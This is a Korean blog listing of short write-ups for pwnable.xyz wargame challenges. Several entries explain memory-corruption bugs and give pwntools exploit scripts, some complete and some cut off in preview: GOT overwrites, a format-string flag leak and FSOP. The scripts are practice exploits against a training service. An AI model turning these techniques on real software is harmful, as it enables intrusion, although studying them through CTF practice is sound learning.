sangjun

War Games/pwnable.*

[ pwnable.xyz ] executioner

1. sleep --> 0을 줘서 sleep(0)으로 만듬 2. strlen() --> 첫 byte "\x00"을 줌 3. "\x00"*2 --> add BYTE [rax], al그냥 dummy shellcode로 준다. from pwn import * context.log_level='debug' context.arch='amd64' def debug(): log.critical(f"pid= {pidof(p)[0]}") pause() #p=process("./challenge") p=remote("svc.pwnable.xyz",30025) p.recvuntil("= ") a=int(p.recvline()[:-1],16) p.sendlineafter(">",str(0)+" "+str(a)) debug()..

War Games/pwnable.*

[ pwnable.xyz ] SUS

cur--> 스택의 주소 --> 힙 주소 --> 입력한 문자들 이렇게 이루어져있다. 우리는 힙 주소 부분을 바꿔서 aaw를 발생시켜야 한다. read_int()함수에서 read함수를 쓰는데 &s가 아니라 &buf에 입력 받기 때문에 스택 구조가 뒤틀린다. age는 힙 주소가 적힌 부분보다 더 낮은 주소부터 쓰기 때문에 힙 주소를 over write가능하다. --> 이후엔 got over write from pwn import * context.log_level='debug' def debug(): log.critical(f"{pidof(p)[0]}") pause() p.interactive() #p=process("./challenge") p=remote("svc.pwnable.xyz",30011) e=..

War Games/pwnable.*

[ pwnable.xyz ] Game

sroce에서 underflow한 이후 save_game에서 type confusion을 이용해 strlen(cur)의 return 값을 늘린다. --> cur+24에 있는 function pointer를 win함수로 덮는다. from pwn import * context.log_level='debug' #p=process("./challenge") p=remote("svc.pwnable.xyz",30009) def edit_name(count): p.sendlineafter(">","3") p.send(b"A"*count) def debug(): log.critical(f"pid= {pidof(p)[0]}") pause() p.interactive() def pwn(): p.sendlineafter("..

War Games/pwnable.*

[ pwnable.xyz ] two target

2번 메뉴에서 overflow로 3번메뉴 scanf에서 AAW가능 --> strncmp got over write from pwn import * #p=process("./challenge") p=remote("svc.pwnable.xyz",30031) e=ELF("./challenge") pay=b"A"*16+b"\x18\x30\x60" #pay="A"*24 print(p64(e.got['puts'])) p.sendlineafter(">","2") p.sendlineafter(":",pay) #print(pidof(p)[0]) pause() p.sendlineafter(">","3") pause() pay2="BBBBBBBB" p.sendlineafter(":",str(4196764)) pause() ..

War Games/pwnable.*

[ pwnable.xyz ] xor

문제소스 int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int v3; // [rsp+Ch] [rbp-24h] __int64 v4; // [rsp+10h] [rbp-20h] __int64 v5; // [rsp+18h] [rbp-18h] __int64 v6; // [rsp+20h] [rbp-10h] unsigned __int64 v7; // [rsp+28h] [rbp-8h] v7 = __readfsqword(0x28u); puts("The Poopolator"); setup(); while ( 1 ) { v6 = 0LL; printf(format, argv); v3 = _isoc99_scanf("%ld %ld %ld..

War Games/pwnable.*

[ pwnable.xyz ] note

from pwn import * context.log_level='debug' #p=process("./challenge") p=remote("svc.pwnable.xyz",30016) e=ELF("./challenge") win=e.sym['win'] p.sendlineafter(">","1") p.sendlineafter("?","50") pay=b"A"*32+p64(e.got['printf']) p.sendlineafter(":",pay) #print(pidof(p)[0]) pause() p.sendlineafter(">","2") p.sendlineafter(":",p64(win)) p.interactive()

War Games/pwnable.*

[ pwnable.xyz ] GrownUp

이름은 스택에 박히고 포멧스트링 버그 발생해서 flag위치를 그냥 %s로 읽어준다. from pwn import * context.log_level='debug' #p=process("./GrownUpRedist") p=remote("svc.pwnable.xyz",30004) p.sendafter("?",b"y"*8+p64(0x601080)) pay="A"*0x20+"%9$s "*20 pay+="A"*(128-len(pay)) #print(pidof(p)[0]) pause() p.sendafter(":",pay) p.interactive()

War Games/pwnable.*

[ pwnable.xyz ] rwsr

문제소스 int __cdecl main(int argc, const char **argv, const char **envp) { const char *v3; // rdi int v4; // eax char *s; // ST10_8 setup(); v3 = "Read Write Sleep Repeat."; puts("Read Write Sleep Repeat."); do { while ( 1 ) { while ( 1 ) { print_menu(); v4 = read_ulong(v3); if ( v4 != 1 ) break; printf("Addr: ", argv); v3 = (const char *)read_ulong("Addr: "); puts(v3); } if ( v4 != 2 ) break; prin..

War Games/pwnable.*

[ pwnable.xyz ] fclose

문제소스 // local variable allocation has failed, the output may be wrong! int __cdecl main(int argc, const char **argv, const char **envp) { setup(*(_QWORD *)&argc, argv, envp); printf("> "); read(0, &input, 0x404uLL); fclose(&input); return 0; } 1. fclose() 임의로 설정한 파일 스트림을 fclose()해준다 --> FSOP로 win함수를 호출해봐라 보호기법 [*] '/xyz/challenge' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found..

War Games/pwnable.*

[ pwnable.xyz ] missallignment

// local variable allocation has failed, the output may be wrong! int __cdecl main(int argc, const char **argv, const char **envp) { char s; // [rsp+10h] [rbp-A0h] _QWORD v5[3]; // [rsp+18h] [rbp-98h] __int64 v6; // [rsp+30h] [rbp-80h] __int64 v7; // [rsp+38h] [rbp-78h] __int64 v8; // [rsp+40h] [rbp-70h] unsigned __int64 v9; // [rsp+A8h] [rbp-8h] v9 = __readfsqword(0x28u); setup(*(_QWORD *)&argc..